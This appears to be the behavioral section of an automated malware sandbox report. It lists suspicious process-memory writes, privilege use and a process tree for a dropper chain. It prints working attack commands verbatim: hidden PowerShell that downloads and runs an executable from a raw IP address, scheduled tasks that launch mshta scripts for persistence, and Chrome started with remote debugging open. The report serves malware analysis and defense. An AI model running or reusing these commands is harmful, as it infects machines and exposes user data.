N/A N/A C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097320101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097320101\BXxKvLN.exe N/A
N/A N/A C:\ProgramData\wtvfpcb\hijexpw.exe N/A
N/A N/A C:\ProgramData\wtvfpcb\hijexpw.exe N/A
N/A N/A C:\Windows\TEMP\{07115CE4-758F-4C61-84E1-CC2DC01C0B27}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5020 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
PID 5020 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
PID 5020 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
PID 2540 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2540 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2540 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 5020 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
PID 5020 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
PID 5020 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
PID 4492 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe
PID 4492 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe
PID 4492 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe
PID 1812 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe C:\Windows\SysWOW64\cmd.exe
PID 1812 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe C:\Windows\SysWOW64\cmd.exe
PID 1812 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe C:\Windows\SysWOW64\cmd.exe
PID 1812 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe C:\Windows\SysWOW64\mshta.exe
PID 1812 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe C:\Windows\SysWOW64\mshta.exe
PID 1812 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe C:\Windows\SysWOW64\mshta.exe
PID 5056 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5056 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5056 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2308 wrote to memory of 1796 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2308 wrote to memory of 1796 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2308 wrote to memory of 1796 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4492 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4492 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 4240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4372 wrote to memory of 4240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4372 wrote to memory of 4240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1796 wrote to memory of 3968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE
PID 1796 wrote to memory of 3968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE
PID 1796 wrote to memory of 3968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE
PID 4372 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4372 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2864 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4372 wrote to memory of 440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 440 wrote to memory of 4224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 440 wrote to memory of 4224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 440 wrote to memory of 4224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4372 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4372 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4372 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4372 wrote to memory of 760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4372 wrote to memory of 760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4372 wrote to memory of 760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 760 wrote to memory of 4532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 4532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 4532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe
PID 4492 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe
PID 4492 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe
PID 4532 wrote to memory of 1112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe

"C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe

C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe

"C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn vaukImabUuH /tr "mshta C:\Users\Admin\AppData\Local\Temp\YpdF1TCRw.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\YpdF1TCRw.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn vaukImabUuH /tr "mshta C:\Users\Admin\AppData\Local\Temp\YpdF1TCRw.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10096490121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE

"C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "Bly4pmawnNh" /tr "mshta \"C:\Temp\iKyDhmRkP.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\iKyDhmRkP.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe

"C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe

"C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe"

C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4424 -ip 4424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 984

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10097250101\OEHBOHk.exe

"C:\Users\Admin\AppData\Local\Temp\10097250101\OEHBOHk.exe"

C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10097270101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10097270101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10097280101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10097280101\4klgwMz.exe"

C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe

"C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe"

C:\Users\Admin\AppData\Local\Temp\10097290101\JCFx2xj.exe

"C:\Users\Admin\AppData\Local\Temp\10097290101\JCFx2xj.exe"

C:\Users\Admin\AppData\Local\Temp\10097300101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10097300101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3776 -ip 3776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 972

C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe

C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe

C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe

C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe

C:\Users\Admin\AppData\Local\Temp\10097320101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10097320101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\10097330101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10097330101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\wtvfpcb\hijexpw.exe

C:\ProgramData\wtvfpcb\hijexpw.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10097340101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10097340101\z3SJkC5.exe"

C:\Windows\TEMP\{113B0A22-EEEA-4B92-812A-F336BDF9854D}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{113B0A22-EEEA-4B92-812A-F336BDF9854D}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10097340101\z3SJkC5.exe" -burn.filehandle.attached=824 -burn.filehandle.self=828

C:\Windows\TEMP\{07115CE4-758F-4C61-84E1-CC2DC01C0B27}\.ba\WiseTurbo.exe

C:\Windows\TEMP\{07115CE4-758F-4C61-84E1-CC2DC01C0B27}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4816 -ip 4816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 832

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4816 -ip 4816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 900

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10097350101\bPDDW9F.exe

"C:\Users\Admin\AppData\Local\Temp\10097350101\bPDDW9F.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd9e46cc40,0x7ffd9e46cc4c,0x7ffd9e46cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1880 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2408 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2480 /prefetch:8

